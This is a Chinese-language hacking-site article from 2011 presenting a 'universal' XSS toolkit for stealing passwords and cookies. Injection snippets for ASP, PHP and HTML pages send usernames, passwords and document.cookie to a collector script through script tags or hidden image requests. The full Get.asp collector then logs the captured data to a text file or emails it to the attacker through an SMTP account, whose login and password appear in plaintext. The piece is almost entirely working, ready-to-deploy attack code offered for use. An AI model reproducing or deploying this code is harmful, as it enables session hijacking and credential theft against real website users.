首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
XSS偷取密码Cookies通用脚本
来源:vfocus.net 作者:vfocus 发布时间:2011-05-06  

很多人经常需要XSS得到别人Cookies或者要在网页里插入脚本或许密码。
今天写个通用脚本工具
文件如下
 

asp.asp或者php.php 或者cookies.htm效果如下
保存文本
 

发送邮件

 

获取的cookies

截获用户名密码
 

主文件Get.asp用来获取发来的信息,并且保存到 TXT或者发送到邮箱
内容如下:使用方法:
asp.asp是Asp中调用Get.asp的例子内容如下
即在存在需要获取的变量的地方添加如下JS代码即可
通常在页面最下面添加即可。因为变量一般赋值后都不会清空。
如果在asp脚本中间需要添加JS则需要先闭合语句
普通浏览复制代码打印代码

<%   
username="admin"
password="admin888"%>   <script src="get.asp?username=<%=username%>&password=<%=password%>" />
<%   response.write Response.Cookies()
%>


<%
username="admin"
password="admin888"
%>
<script src="get.asp?username=<%=username%>&password=<%=password%>" />
<%
response.write Response.Cookies()
%>
普通浏览复制代码打印代码

<?   
$username="admin";   $password="admin888";
?>
<script src="get.asp?username=<?=$username;?>&password=<?=$password;?>"/>


<?
$username="admin";
$password="admin888";
?>
<script src="get.asp?username=<?=$username;?>&password=<?=$password;?>"/>
普通浏览复制代码打印代码

<script>
var url="Get.asp?cookies="+document.cookie;   var image = new Image();
image.style.width = 0;   image.style.height = 0;
image.src = url;
</script>


<script>
var url="Get.asp?cookies="+document.cookie;
var image = new Image();
image.style.width = 0;
image.style.height = 0;
image.src = url;
</script>
php.php是PHP中使用例子。代码如下:cookies.htm是用来获取Cookies的例子
代码如下:
有任何问题和意见跟帖。。。
另外。
所有的参数可以自己添加。你可以Get.asp?a=abc&b=abc&c=abcZ&...多少个变量都行...Get.asp?账号=abc&密码=abc这样也可以
具体自己用用就明白了。
需要深入处理Cookies的自己根据实际情况调整吧。。
这只是一个通用的。方便例子。呼呼。

普通浏览复制代码打印代码

<%   
SaveFile="pass.txt"
'保存获取数据的TXT
IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件YourSendMail="521hack@163.com"
'用来发送的邮箱
YourSendMailUser="521hack"
'邮箱登陆用户名YourSendMailPass="123456abcf"
'邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码...
YourSendMailServer="smtp.163.com"
'邮件服务器YourMailTitle="有新截获的数据来了!"
'邮件标题
YourRecvMail="xxxx@qq.com"
'收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息
sub sendmail(content)
On error resume next   dim JMail
Set JMail = Server.CreateObject("JMail.Message")    JMail.Logging = TrueJMail.Charset = "gb2312"
JMail.ContentType = "text/html"JMail.From = YourSendMail   JMail.FromName = ""&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser   JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1    JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle   JMail.Body = content
JMail.Send("smtp.163.com")    Set JMail = nothing
If err then    Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"else   Response.write "发送成功!"end if   end sub

GetPostStr=Request.QueryString
if GetPostStr="" then   Response.write "None!"end if
if ifsendmail then   StrTemp=Replace(GetPostStr,"=",":")
StrTemp=Replace(StrTemp,"&","<br>")   sendmail(StrTemp)
else   set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)   TempStr=Split(GetPostStr,"&")
for TempI=0  To Ubound(TempStr)   I.WriteLine(Replace(TempStr(TempI),"=",":"))
next   I.WriteLine(now())
I.WriteLine("--------------------------------")   I.close
Set F=nothing   end if
%>


<%
SaveFile="pass.txt" '保存获取数据的TXT
IfSendMail=true '是否使用邮件发送,如果True则发送邮件不保存TXT 如果false则保存txt而不发送邮件
YourSendMail="521hack@163.com" '用来发送的邮箱
YourSendMailUser="521hack" '邮箱登陆用户名
YourSendMailPass="123456abcf" '邮箱登陆密码 (以上3项邮箱、账号、密码改成自己的) 这里用我的备用邮箱给你们测试,24小时后我修改密码...
YourSendMailServer="smtp.163.com" '邮件服务器
YourMailTitle="有新截获的数据来了!" '邮件标题
YourRecvMail="xxxx@qq.com" '收取截获数据的邮箱,建议使用QQ邮箱,可以实时提示,让你第时间得到要的信息

sub sendmail(content)
On error resume next
dim JMail
Set JMail = Server.CreateObject("JMail.Message")
JMail.Logging = True
JMail.Charset = "gb2312"
JMail.ContentType = "text/html"
JMail.From = YourSendMail
JMail.FromName = ""&YourSendMailUser
JMail.MailServerUserName = YourSendMailUser
JMail.MailServerPassword = YourSendMailPass
JMail.Priority = 1
JMail.AddRecipient YourRecvMail
JMail.Subject = YourMailTitle
JMail.Body = content
JMail.Send("smtp.163.com")
Set JMail = nothing
If err then
Response.write "发送失败!请检查配置!并确认你的服务器是否支持Jmail!"
else
Response.write "发送成功!"
end if
end sub

GetPostStr=Request.QueryString
if GetPostStr="" then
Response.write "None!"
end if

if ifsendmail then
StrTemp=Replace(GetPostStr,"=",":")
StrTemp=Replace(StrTemp,"&","<br>")
sendmail(StrTemp)
else
set F=server.CreateObject("scripting.filesystemobject")
set I=F.OpenTextFile(server.mappath(SaveFile),8,True,0)
TempStr=Split(GetPostStr,"&")
for TempI=0  To Ubound(TempStr)
I.WriteLine(Replace(TempStr(TempI),"=",":"))
next
I.WriteLine(now())
I.WriteLine("--------------------------------")
I.close
Set F=nothing
end if
%>


%> '闭合上半部分
这里是js
<% '闭合下半部分


%> '闭合上半部分
这里是js
<% '闭合下半部分


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·利用ewebeditor 5.5 - 6.0 鸡肋
·0day批量拿站webshell,挖掘机是
·OmniPeek抓包的一点看法
·Windows系统密码破解全攻略
·破解禁止SSID广播
·Intel 3945ABG用OmniPeek 4.1抓
·破解无线过滤MAC
·XSS漏洞基本攻击代码
·强大的嗅探工具ettercap使用教程
·KesionCMS V7.0科汛内容网站管理
·Metasploit 权限提升
  相关文章
·XSS漏洞基本攻击代码
·XSS(跨站)偷cookie的代码
·Xss获取管理员后台地址实战
·渗透校内网——XSS过程详解
·mysql可多语句执行下不用单引号o
·高级PHP手工注入
·xss跨站脚本攻击大全
·微软的“后门”:NTSD.exe,的远
·1433终极入侵之沙盒模式
·linux不提权跨目录访问的代码
·Firefox攻击技巧总结
·入侵纽约大学过程
  推荐广告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved